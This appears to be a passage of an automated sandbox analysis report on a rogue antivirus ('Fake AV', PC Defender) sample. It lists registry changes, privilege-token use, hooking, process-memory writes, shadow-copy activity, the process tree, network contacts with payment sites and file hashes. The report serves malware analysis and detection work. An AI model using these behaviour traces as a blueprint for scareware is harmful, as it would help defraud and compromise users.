Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AdvertiseFlags = "388" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Version = "16777216" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\PackageName = "PCDefenderSilentSetup.msi" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\DeploymentFlags = "3" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Media C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528\DefaultFeature C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2292 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2660 wrote to memory of 1660 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1660 wrote to memory of 344 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 344 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 344 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 344 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 1500 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 1500 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 1500 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 1500 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 820 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 820 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 820 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 820 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\reg.exe
PID 1660 wrote to memory of 2824 N/A C:\Windows\syswow64\MsiExec.exe C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe
PID 1660 wrote to memory of 2824 N/A C:\Windows\syswow64\MsiExec.exe C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe
PID 1660 wrote to memory of 2824 N/A C:\Windows\syswow64\MsiExec.exe C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe
PID 1660 wrote to memory of 2824 N/A C:\Windows\syswow64\MsiExec.exe C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe
PID 2824 wrote to memory of 1148 N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe
PID 2824 wrote to memory of 1148 N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe
PID 2824 wrote to memory of 1148 N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe
PID 2824 wrote to memory of 1148 N/A C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe
PID 1752 wrote to memory of 1700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Windows\System32\ie4uinit.exe
PID 1752 wrote to memory of 1700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Windows\System32\ie4uinit.exe
PID 1752 wrote to memory of 1700 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Windows\System32\ie4uinit.exe
PID 1752 wrote to memory of 2144 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1752 wrote to memory of 2144 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1752 wrote to memory of 2144 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1752 wrote to memory of 2144 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005BC" "00000000000004A0"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding D03C52A3A4BAC024271885A7D74981C4 M Global\MSI0000

C:\Windows\SysWOW64\reg.exe

"C:\Windows\SysWOW64\reg.exe" COPY HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ /s /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\SysWOW64\reg.exe" COPY HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ /s /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\SysWOW64\reg.exe" COPY HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ /s /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\SysWOW64\reg.exe" DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 /f

C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe

"C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe"

C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe

"C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe" Antispyware.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -startmediumtab -Embedding

C:\Windows\System32\ie4uinit.exe

"C:\Windows\System32\ie4uinit.exe" -ShowQLIcon

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1752 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1752 CREDAT:537612 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1752 CREDAT:275482 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.plimus.com udp
US 104.18.31.105:443 www.plimus.com tcp
US 104.18.31.105:443 www.plimus.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 104.18.31.105:443 www.plimus.com tcp
US 104.18.31.105:443 www.plimus.com tcp
US 8.8.8.8:53 www.bluesnap.com udp
US 141.193.213.20:443 www.bluesnap.com tcp
US 141.193.213.20:443 www.bluesnap.com tcp
US 141.193.213.20:443 www.bluesnap.com tcp
US 141.193.213.20:443 www.bluesnap.com tcp
US 104.18.31.105:443 www.plimus.com tcp
US 104.18.31.105:443 www.plimus.com tcp
US 141.193.213.20:443 www.bluesnap.com tcp
US 141.193.213.20:443 www.bluesnap.com tcp
US 8.8.8.8:53 cp.bluesnap.com udp
US 8.8.8.8:53 cp.bluesnap.com udp
US 104.18.26.40:443 cp.bluesnap.com tcp
US 104.18.26.40:443 cp.bluesnap.com tcp
US 104.18.26.40:443 cp.bluesnap.com tcp
US 104.18.26.40:443 cp.bluesnap.com tcp
US 104.18.26.40:443 cp.bluesnap.com tcp
US 104.18.26.40:443 cp.bluesnap.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi

MD5 7f728acab22868ca02cc1ba0a14f5d64
SHA1 9e3e82b152447b8bcd27583fbdab7aa91ca4739d
SHA256 586f9a9af50b2a3321e77d2b4583741cc4842967af9429cc371534f7179caec4
SHA512 9bc8bb97e6d4f18ec484fcd792466cb5df0bf0447cbaa19a41258ef80e599e8a2b2c83c700f32f30bef578b03614af1b554844d051435dc9f510ccbd56686800

memory/1660-26-0x0000000000280000-0x0000000000282000-memory.dmp

C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe

MD5 af4761437567f84ffbec44c978ac2634
SHA1 488e27e01b629f3c2cd274a3c6572cdb040fc137
SHA256 41922380e3a419fea5a794a16e7abe3364c08da6c66fca0ce8f37c20e21ede68
SHA512 82694af3458a01040b9753f133e446c32fef105d4d36dfe8a5fa944080f4b6736dc8e4fbe2abb3db6f79ff24f8e1b9f07543c1193410cfa0a3faafd3e1ce096d

C:\Config.Msi\f76c19e.rbs

MD5 c156397be71b0387833fa5ee82450c83
SHA1 f64696065ed78ecb6527c5c2bc14531b24283358
SHA256 24b9d981a3d19e77963e826656db1ef21f0d15caa89d2a5575c3c6a56d43162f
SHA512 ada3559e0c9a18acfd92c97af42dd037a4b2138afde8f12f5d719365ccfbeb8d4e0facd2f6268f5540fa05982d64d0c59626547e15b0ea4afc1f27ee5def122f

\Program Files (x86)\Def Group\PC Defender\hook.dll

MD5 dc973050688bfd27a2d47e0ac2e21abb
SHA1 3ff84e8c292051aa7e57439aa44b7beac68b2d71
SHA256 e69c437e565390cbc0209e7934136cc68a7caa07cf7341c870dac35ca549b225
SHA512 4123df1cb903bff54897e1edd8c8c877e3fff9b81de9919569b3096fac8d80d06f73f005ef1c63269f4b50d7ee1965deb13d473b32f365c8324880ab995a600c

C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe

MD5 c2514c216b4b6dac1a4d740126177f29
SHA1 c25d7b051339c9d0b1ee109abfb12724a24f130d
SHA256 8212f98e9caedd00bab3c3d561055507cd617cc2b2151c956968caeccde66e11
SHA512 dfe6dab9e14b539e50eea2b8314f3937f650eded149d1264763ee4d0d045bf1959569cb31e9e7d5bf602e49c68401cde02e2e552ef3d0baca2e4d48c53d78692

memory/2824-167-0x0000000002530000-0x0000000002532000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab95CA.tmp

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar96E8.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ece29a6d223a9b0606015e0edaca2274
SHA1 7cb5496f3fddf20006215bf4d3db56c86a9f9f3d
SHA256 993e4ed452681c71c09a020f6dc286d31874775fb9adbc98728bc20827e6cf0e
SHA512 2964fb5ba228e5bb1c96cb90a477cfde43e85dacccc284d1394f2e19a4ad44c779d9ab48fc973abdccbbf0ecb22af26937776081e543dbaa4e65870a74b2aa42

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 f214c493fcdf1d0d7846f0e333dfd429
SHA1 6328cd1f245c473a710622f271dbc23958e8b36f
SHA256 b115366d00d960c96f2c54ce06f7b8af704cb2566182cdf75e29cf9576661dc5
SHA512 59200140399a99311b8eb5f4948a7569a568eb14449e05d2d4ddf1004de96ed52f8d970dcd6854ddfdbe08827f61467cfc2905549dfe90381b25b5395be5c38e

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

